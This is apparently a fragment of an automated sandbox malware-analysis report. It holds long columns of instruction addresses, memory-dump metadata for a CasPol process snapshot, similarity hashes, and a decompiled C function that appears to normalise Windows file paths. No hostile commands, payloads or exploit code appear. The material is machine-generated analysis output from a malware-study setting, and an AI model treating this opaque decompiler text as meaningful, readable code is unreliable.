                                                                        0x004220ce
                                                                        0x004220d5
                                                                        0x004220da
                                                                        0x004220db
                                                                        0x004220e1
                                                                        0x004220e2
                                                                        0x004220e3
                                                                        0x004220e9
                                                                        0x004220ef
                                                                        0x004220f5
                                                                        0x004220f6
                                                                        0x00422101
                                                                        0x00422107
                                                                        0x00422109
                                                                        0x00422110
                                                                        0x00422116
                                                                        0x0042211c
                                                                        0x00422122
                                                                        0x00422128
                                                                        0x0042212b
                                                                        0x00422131
                                                                        0x00422137
                                                                        0x0042213e
                                                                        0x00422147
                                                                        0x0042214d
                                                                        0x00422153
                                                                        0x00422159
                                                                        0x00422160
                                                                        0x00422166
                                                                        0x0042216c
                                                                        0x00422172
                                                                        0x00422178
                                                                        0x0042217a
                                                                        0x0042217a
                                                                        0x00422180
                                                                        0x00422186
                                                                        0x0042218c
                                                                        0x00422196
                                                                        0x0042219d
                                                                        0x004221a3
                                                                        0x004221a4
                                                                        0x004221aa
                                                                        0x004221ab
                                                                        0x004221b2
                                                                        0x004221be
                                                                        0x004221bf
                                                                        0x004221c5
                                                                        0x004221cb
                                                                        0x004221d6
                                                                        0x004221dc
                                                                        0x004221e2
                                                                        0x004221e3
                                                                        0x004221e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004221ef
                                                                        0x004221f9
                                                                        0x004221ff
                                                                        0x00422205
                                                                        0x0042220a
                                                                        0x0042220b
                                                                        0x00422210
                                                                        0x00422211
                                                                        0x0042221d
                                                                        0x0042222a
                                                                        0x0042222b
                                                                        0x0042222c
                                                                        0x0042222f
                                                                        0x00422235
                                                                        0x0042223b
                                                                        0x00422241
                                                                        0x00422248
                                                                        0x0042224e
                                                                        0x0042224e
                                                                        0x0042224e
                                                                        0x00422254
                                                                        0x0042225a
                                                                        0x0042225b
                                                                        0x00422261
                                                                        0x00422262
                                                                        0x00422268
                                                                        0x00422274
                                                                        0x0042227a
                                                                        0x0042227b
                                                                        0x00422281
                                                                        0x00422293
                                                                        0x00422298
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042229e
                                                                        0x004222a4
                                                                        0x004222aa
                                                                        0x004222b0
                                                                        0x004222b6
                                                                        0x004222bc
                                                                        0x004222c2
                                                                        0x004222c9
                                                                        0x004222d5
                                                                        0x004222d6
                                                                        0x004222db
                                                                        0x004222e1
                                                                        0x004222e7
                                                                        0x004222e7
                                                                        0x004222e7
                                                                        0x004222ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004222f3
                                                                        0x004222fa
                                                                        0x00422300
                                                                        0x0042230c
                                                                        0x00422313
                                                                        0x00422319
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042231f
                                                                        0x00422329
                                                                        0x0042232f
                                                                        0x00422335
                                                                        0x0042233c
                                                                        0x0042233d
                                                                        0x00422343
                                                                        0x00422349
                                                                        0x00422350
                                                                        0x00422357
                                                                        0x0042235d
                                                                        0x00422363
                                                                        0x00422364
                                                                        0x0042236b
                                                                        0x00422371
                                                                        0x00422377
                                                                        0x0042237d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00422383
                                                                        0x00422389
                                                                        0x0042238f
                                                                        0x00422395
                                                                        0x0042239b
                                                                        0x0042239b
                                                                        0x0042239b
                                                                        0x004223a1
                                                                        0x004223ad
                                                                        0x004223b4
                                                                        0x004223c0
                                                                        0x004223cd
                                                                        0x004223cf
                                                                        0x004223d5
                                                                        0x004223db
                                                                        0x004223e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004223e7
                                                                        0x004223ed
                                                                        0x004223f3
                                                                        0x00422402
                                                                        0x00422408
                                                                        0x0042240f
                                                                        0x00422411
                                                                        0x0042241d
                                                                        0x00422423
                                                                        0x00422426
                                                                        0x0042242c
                                                                        0x00422433
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042243f
                                                                        0x00422442
                                                                        0x00422449
                                                                        0x00422450
                                                                        0x00422457
                                                                        0x0042245e
                                                                        0x0042245e
                                                                        0x0042245e
                                                                        0x00422464
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042246a
                                                                        0x00422470
                                                                        0x00422477
                                                                        0x00422478
                                                                        0x0042247d
                                                                        0x00422483
                                                                        0x00422488
                                                                        0x00422489
                                                                        0x0042248f
                                                                        0x0042248f
                                                                        0x0042248f
                                                                        0x00422495
                                                                        0x004224a2
                                                                        0x004224a8
                                                                        0x004224a9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004224af
                                                                        0x004224b5
                                                                        0x004224bb
                                                                        0x004224bc
                                                                        0x004224c2
                                                                        0x004224c8
                                                                        0x004224cf
                                                                        0x004224db
                                                                        0x004224e2
                                                                        0x004224e7
                                                                        0x004224ee
                                                                        0x004224f1
                                                                        0x004224f7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004224fd
                                                                        0x00422503
                                                                        0x0042250a
                                                                        0x00422510
                                                                        0x00422516
                                                                        0x0042251c
                                                                        0x00422521
                                                                        0x00422526
                                                                        0x0042252d
                                                                        0x00422533
                                                                        0x00422534
                                                                        0x00422535
                                                                        0x0042253b
                                                                        0x00422542
                                                                        0x00422549
                                                                        0x0042254a
                                                                        0x00422550
                                                                        0x0042255d
                                                                        0x0042255e
                                                                        0x0042255f
                                                                        0x00422562
                                                                        0x00422569
                                                                        0x0042256c
                                                                        0x00422572
                                                                        0x00422573
                                                                        0x0042257a
                                                                        0x00422584
                                                                        0x0042258a
                                                                        0x00422591
                                                                        0x00422597
                                                                        0x00422598
                                                                        0x0042259e
                                                                        0x0042259f
                                                                        0x004225a5
                                                                        0x004225af
                                                                        0x004225b0
                                                                        0x004225b6
                                                                        0x004225b8
                                                                        0x004225be
                                                                        0x004225c5
                                                                        0x004225cb
                                                                        0x004225d1
                                                                        0x004225d2
                                                                        0x004225d8
                                                                        0x004225df
                                                                        0x004225e5
                                                                        0x004225eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004225fd
                                                                        0x00422603
                                                                        0x00422608
                                                                        0x0042260f
                                                                        0x00422616
                                                                        0x00422617
                                                                        0x0042261d
                                                                        0x0042261e
                                                                        0x00422624
                                                                        0x00422625
                                                                        0x0042262c
                                                                        0x00422632
                                                                        0x00422638
                                                                        0x0042263f
                                                                        0x00422644
                                                                        0x0042264a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00422650
                                                                        0x00422657
                                                                        0x0042265f
                                                                        0x00422660
                                                                        0x00422661
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00422667
                                                                        0x0042266d
                                                                        0x0042266e
                                                                        0x00422675
                                                                        0x00422676
                                                                        0x0042267c
                                                                        0x0042267f
                                                                        0x00422686
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042268c
                                                                        0x00422692
                                                                        0x00422698
                                                                        0x0042269e
                                                                        0x004226a5
                                                                        0x004226ab
                                                                        0x004226b1
                                                                        0x004226b7
                                                                        0x004226bd
                                                                        0x004226bd
                                                                        0x004226bd
                                                                        0x004226c3
                                                                        0x004226c3
                                                                        0x004226c9
                                                                        0x004226ca
                                                                        0x004226ca
                                                                        0x004226ca
                                                                        0x004226d0
                                                                        0x004226d7
                                                                        0x004226d7
                                                                        0x004226dd
                                                                        0x004226e3
                                                                        0x004226ef
                                                                        0x004226f6
                                                                        0x004226fc
                                                                        0x00422702
                                                                        0x00422709
                                                                        0x0042270a
                                                                        0x00422710
                                                                        0x00422716
                                                                        0x00422726
                                                                        0x0042272d
                                                                        0x0042272e
                                                                        0x00422734
                                                                        0x0042273a
                                                                        0x00422740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00422746
                                                                        0x0042275b
                                                                        0x00422761
                                                                        0x00422761
                                                                        0x00422761
                                                                        0x00422767
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042276d
                                                                        0x00422774
                                                                        0x0042277a
                                                                        0x00422781
                                                                        0x00422787
                                                                        0x0042278b
                                                                        0x00422791
                                                                        0x00422797
                                                                        0x00422797
                                                                        0x00422797
                                                                        0x0042279d
                                                                        0x004227a3
                                                                        0x004227a9
                                                                        0x004227af
                                                                        0x004227b0
                                                                        0x004227b6
                                                                        0x004227bc
                                                                        0x004227c2
                                                                        0x004227c8
                                                                        0x004227ce
                                                                        0x004227cf
                                                                        0x004227d5
                                                                        0x004227d6
                                                                        0x004227dc
                                                                        0x004227e2
                                                                        0x004227e3
                                                                        0x004227e9
                                                                        0x004227ef
                                                                        0x004227f6
                                                                        0x004227fc
                                                                        0x004227fd
                                                                        0x00422803
                                                                        0x0042280a
                                                                        0x00422810
                                                                        0x00422811
                                                                        0x00422817
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042281d
                                                                        0x00422823
                                                                        0x0042282a
                                                                        0x0042282b
                                                                        0x00422831
                                                                        0x00422834
                                                                        0x0042283a
                                                                        0x0042283b
                                                                        0x0042283c
                                                                        0x00422843
                                                                        0x00422846
                                                                        0x0042284c
                                                                        0x00422852
                                                                        0x00422857
                                                                        0x00422863
                                                                        0x00422869
                                                                        0x00422870
                                                                        0x00422875
                                                                        0x00422885
                                                                        0x0042288b
                                                                        0x00422892
                                                                        0x00422893
                                                                        0x00422899
                                                                        0x0042289f
                                                                        0x004228a6
                                                                        0x004228ac
                                                                        0x004228b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004228bf
                                                                        0x004228c6
                                                                        0x004228c7

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                        • Instruction ID: 509941d02471cfaa0b7e45a818e523af46d733f3b8c874efea17fe81caa4faa2
                                                                        • Opcode Fuzzy Hash: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                        • Instruction Fuzzy Hash: 5E32B732A08790CFD716DF38D98AA413FB1F396724B44438ED4A2971E6D7392616CF89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D6E30 Relevance: .5, Instructions: 481COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E013D6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x148fca8);
				_push(0x14017f0);
				_push( *[fs:0x0]);
				_t312 =  *0x14ad360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E013FFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E013D74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E013E9BC6( &_v52, 0x1391080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E013F9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E014346A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M013D749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E013B52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L013C2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L013C2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L01434735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E013FBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E013E2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L01434658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E013E9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E013B52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L013B83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E013B52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L013B83AE(_t428);
														L80:
														E013E9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1391080;
														_v72 =  *0x1391080;
														__eax =  *0x1391084;
														_v68 =  *0x1391084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E013E9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E013D746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E013FB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                                                        0x013d6e30
                                                                        0x013d6e35
                                                                        0x013d6e37
                                                                        0x013d6e3c
                                                                        0x013d6e47
                                                                        0x013d6e4b
                                                                        0x013d6e50
                                                                        0x013d6e53
                                                                        0x013d6e55
                                                                        0x013d6e5b
                                                                        0x013d6e5f
                                                                        0x013d6e65
                                                                        0x013d6e68
                                                                        0x013d6e6a
                                                                        0x013d6e6d
